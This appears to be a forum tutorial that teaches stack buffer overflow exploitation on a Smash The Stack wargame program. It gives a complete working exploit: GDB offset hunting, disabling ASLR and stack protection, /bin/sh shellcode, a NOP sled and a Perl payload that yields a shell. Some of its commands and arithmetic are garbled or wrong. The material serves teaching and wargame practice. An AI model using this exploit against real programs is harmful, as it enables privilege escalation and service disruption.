Buffer Overflow Exploitation for Beginners

Prerequisites: 

Basic/Intermediate knowledge of Assembly Language
Basic/Intermediate knowledge of GDB (GNU Debugger) Which is the debugger I will be using for this tutorial
A good understanding of the C/C++ Languages
A good understanding of how the stack is ordered and processed in a computer

So, a while back (about 4 months ago at this point), I wrote an article on Reddit regarding the exploitstion of Buffer Overflows, and neglected to post it to the site, due to being extremely tired, so it was forgotten, and after various jabs from Shinobi on IRC, am going to (finally) post it, here goes it:

Introduction:

A Buffer Overflow, is a vulnerability which is encountered when a program writing data to a buffer, exceeds the bounds of the buffer, causing the excess data to overflow into adjacent memory.

Picture this, we have created a C program, in which we have initialized a variable, buffer, of type char, with a buffer size of 500 bytes:

int main(void) {

    char buffer[500];

}

And in this program, we take input from the command line, which is then copied to a buffer, via the C function strcpy().

int main(int argc, char *argv[]) {

    char buffer[500];

    strcpy(buffer, argv[1]);

}

Notice, that we have not checked whether or not the length of argv[1] is within the buffers range of 500 bytes; Why not? Well, you'd think that like most modern day programming languages, the strcpy() function would check this before copying the data to the buffer? This is not the case, and is a common misconception made my novice programmers who are not aware of the security implications regarding certain functions, which is why this vulnerability exists and may continue to exist further into the future.

Now, you may be wondering how you could possibly exploit such a vulnerability, I mean what good is writing a few bytes into memory.. Well, on it's own, nothing, but if you were to overwrite the return pointer of the function which you are within, you could ultimately alter the flow of code execution within the program that you are targeting. For example, in the program above, say that theoretically the memory location of buffer starts at 0x00000000, and ends at 0x0000007D (which should have 500 bytes of space), and that the return pointer is located 524 Bytes away from that, it would take an input of 1024 Bytes, e.g 1024 "A"'s, to get "behind" the return pointer, which means that you can then overwrite the next 4 bytes of memory defined as the return pointer, and then watch as it is POP'ed into the EIP register, and executes whatever code, malicious or otherwise, which may lie on the other end address you specify.

Exploiting the Buffer Overflow vulnerability:

Now we get on to the really fun bit, where we actually get to exploit a program which is susceptible to this exploit vector. If you are going to attempt this on your own computer, firstly, make sure you are NOT using Windows >= Vista, as Windows >= Vista, have protections in place, such as ESP (Executable Space Protection), ASLR (Address Space Layout Randomization), and various other exploit prevention techniques. It would be more advisable to use operating systems such as Linux, Unix, and other Unix based operating systems to get this working, as it's easier to disable the countermeasures put in place by running a command such as:

sudo echo > /proc/sys/kernel/randomize_va_space

Which will disable your systems ASLR until you reboot, which is not an option in Windows operating systems (that I'm aware of).

If you do not have access to a Linux operating system, or are too lazy to dual boot or install a VM, you can SSH into various wargaming servers (such as Smash The Stack or Over The Wire) to practice the skills learned here in a legal and safe way, with minimalistic effort, for all you lazy h4xx0rs out there.

Now, on with thy spl0itz.

I'm going to use a simple source code from Smash The Stack : Blowfish, which does not currently have a webpage. Here is the code:

#include <stdio.h>

int main(int argc, char * argv[]) {

    char buf[256];

    if(argc == 1) {

        printf("Usage: %s input\n", argv[]);
        exit();

    }

    strcpy(buf,argv[1]);
    printf("%s", buf);

}

As you can see, it follows the same principles as the example code used previously in the tutorial, but with some extra validation to make sure that argv[1] is present.

So, lets compile this code and continue.

In this tutorial, I'm going to use GCC (GNU C Compiler) from the GNU Compiler Collection to compile my code. I will compile using the following command:

gcc bof.c -g -fno_stack_protector -o bof

Which will compile the code with required headers for gdb to be able to debug it, and also disable gcc's stack protection in systems which have patched gcc to have it enabled by default.

Once we have compiled our vulnerable code, we can open the executable, which I have called "bof", with GDB, for debugging, using the command:

gdb bof

Which should give you something similar to this:

Quote:

GNU gdb 6.8-debian Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu"... (gdb)

Now that we are in GDB, we can start getting into the real exploitation; firstly, we want to make sure that we can run the executable correctly from GDB. We can do this simply by typing "run", which should return:

Quote:

Usage: /home/bof input

Program exited normally.

If it returns an error instead, then try moving to a folder where you have sufficient permissions.

Assuming that the program executes, then exits normally, we can carry on.

We now need to establish how many bytes we have to enter until we have control over the return pointer. There is two main ways to do this:

Trial and error

or

A string which never repeats a sequence of bytes, allowing for easy identification

I tend to just use trial and error, as the second option requires the Metasploit Framework, which may not be available on machines such as the ones you will encounter while wargaming.

So, for trial and error, we want to type run:

run perl -e 'print "A" x 512'

which for me, causes a segmentation fault, which occurs when EIP is set to an address which cannot be executed, or is outside of the available memory for the program.

So, now that we know the return pointer resides within 512 bytes of the start of our buffer, we can start to slowly decrement the amount of "A"'s that we print, until the program executes without error, and returns "Program Exited Normally.", which for me, occurs at 268 Bytes, which is only 12 Bytes away from the end of our buffer. This means that the return pointer lies between 268 Bytes and 273 Bytes.

Armed with this knowledge, we can move on to adding in our shellcode, which is comprised of the opcodes of Assembly instructions. The shellcode I will be using for this tutorial is a /bin/sh shellcode written by a fairly recently retired member of SoldierX, jip, which will drop you into a bash shell which has the permissions of the program you are attacking. Here it is:

\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

So, what do we do now? Well, we have to incorporate this into our exploit. we do this by first adding the shellcode into the Perl string, giving us this bash / Perl code:

run perl -e 'print "A" x 268 . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'

And then we must take away the amount of Bytes the shellcode contains, from the overall amount of "A"'s (or whatever filler you are using), so that we still retain control over the return pointer. In order to do this, we must replace the number "268", with "(268 - 26)", where 26 is the amount of Bytes in the shellcode (Every 2 Bytes in the shellcode equates to one Byte in Hex, the "\x" signifies the following 2 Bytes are a hexadecimal Byte). This will give is this code:

run perl -e 'print "A" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'

This command on it's own will not actually give us a working exploit; for that, we need to find out the address of where our shellcode is stored. But before we get into the nitty gritty with Assembly Language, I want to make 2 more adjustments to our current exploit:

A nop sled
An address "placeholder", as the longer or shorter the exploit is, the more the memory allocations shift around. by giving us a placeholder, we are securing a permanent place in memory

The altered code will look like this:

run perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xff\xff\xff\xff"'

Now, we've got an almost working exploit, all we have to do now, is find that memory address, to do that, we have to run "disas main", which will give us the following result:

Quote:

Dump of assembler code for function main:
0x080483f4 : push %ebp
0x080483f5 : mov %esp,%ebp
0x080483f7 : sub $0x118,%esp
0x080483fd : and $0xfffffff0,%esp
0x08048400 : mov $0x0,%eax
0x08048405 : sub %eax,%esp
0x08048407 : cmpl $0x1,0x8(%ebp)
0x0804840b : jne 0x804842e
0x0804840d : mov 0xc(%ebp),%eax
0x08048410 : mov (%eax),%eax
0x08048412 : mov %eax,0x4(%esp)
0x08048416 : movl $0x8048574,(%esp)
0x0804841d : call 0x80482f8
0x08048422 : movl $0x0,(%esp)
0x08048429 : call 0x8048308
0x0804842e : mov 0xc(%ebp),%eax
0x08048431 : add $0x4,%eax
0x08048434 : mov (%eax),%eax
0x08048436 : mov %eax,0x4(%esp)
0x0804843a : lea -0x108(%ebp),%eax
0x08048440 : mov %eax,(%esp)
0x08048443 : call 0x8048318
0x08048448 : lea -0x108(%ebp),%eax
0x0804844e : mov %eax,0x4(%esp)
0x08048452 : movl $0x8048585,(%esp)
0x08048459 : call 0x80482f8
0x0804845e : leave
0x0804845f : ret
End of assembler dump.

This is where you will need to have some knowledge of Assembly to get through

As you can see, we have a full dump of the programs Assembly code; so, what do we do with it? Well, first, we have to look for the call to strcpy(), which should be pretty easy, as it's marked in the Assembly code as "strcpy@plt". So once he know where the strcpy() is called, we can set a break point to pause before it is called, and examine the stack. To do this, run the command "break *main+79".

Run the program again, and we should get something like:

Quote:

Breakpoint 1, 0x08048443 in main () (gdb)

which signifies that the program is waiting at the specified breakpoint.

We now want to examine the top two pointers on the stack, which are the arguments which will be passed to the strcpy() function. To do this we type "x/2x $esp", which will give us:

Quote:

0xbfffd6c0: 0xbfffd6d0 0xbfffd974

The two addresses after the colon are the addresses that we are interested in. To view what data they hold, we have to type "x/s 0xbfffd6d0", which will give us:

Quote:

0xbfffd6d0: "\210"

Which is clearly not our shellcode, so this must be the buffer before we have written to it. So, if we type "x/s 0xbfffd974", we should see our shellcode.

Quote:

0xbfffd974: '\220' ...

Hmm.. Well that's odd.. No shellcode. Oh yeah, it's further down, past the Nops. Press enter once and we should see it.

Quote:

0xbfffda3c: '\220' , "1ÀPhn/shh//bi\211ãP\211âS\211á°\vÍ\200ÿÿÿÿ"

That's it! We know where our shellcode is stored, so now we can take the address "0xbfffd974" and substitute it right into the exploit.. right? Nope, we must swap the byte order around due to a "phenomena" known as Little Endian byte order, which causes byte orders to switch around inside addresses. So, we switch around the Bytes to give us "74 d9 ff bf", which then need to have "\x" prepended, as they are hex bytes, which will give us "\x74\xd9\xff\xbf". This can now be substituted into our exploit to give us the Perl code:

run perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x74\xd9\xff\xbf"'

Which, when run, should give us a shell Laughing out loud (Note that sometimes GDB does not have the permissions required, so you should run it outside GDB, by typing "quit", then replacing "run" with the name of the binary):

Quote:

sh-3.2$

WE DID IT! Laughing out loud

From now on, you will have a shell in the specified application (until you choose to quit)! Once you do quit, however, the program will crash, and most likely cause Denial Of Service in programs such as web servers, which are responsible for serving data to clients.

I'm not going to cover how to alter the flow of execution so that the program continues to function correctly, as this is meant to be a tutorial explaining the basics of the buffer overflow, how the concept works and is exploited, so, that is the end of my Buffer Overflow Exploitation tutorial, I hope that you learned how to exploit buffer overflows quickly and easily (if not, feel free to pm me with any questions or problems and I'll make sure to get back to you), thanks a lot Tongue,

xAMNESIAx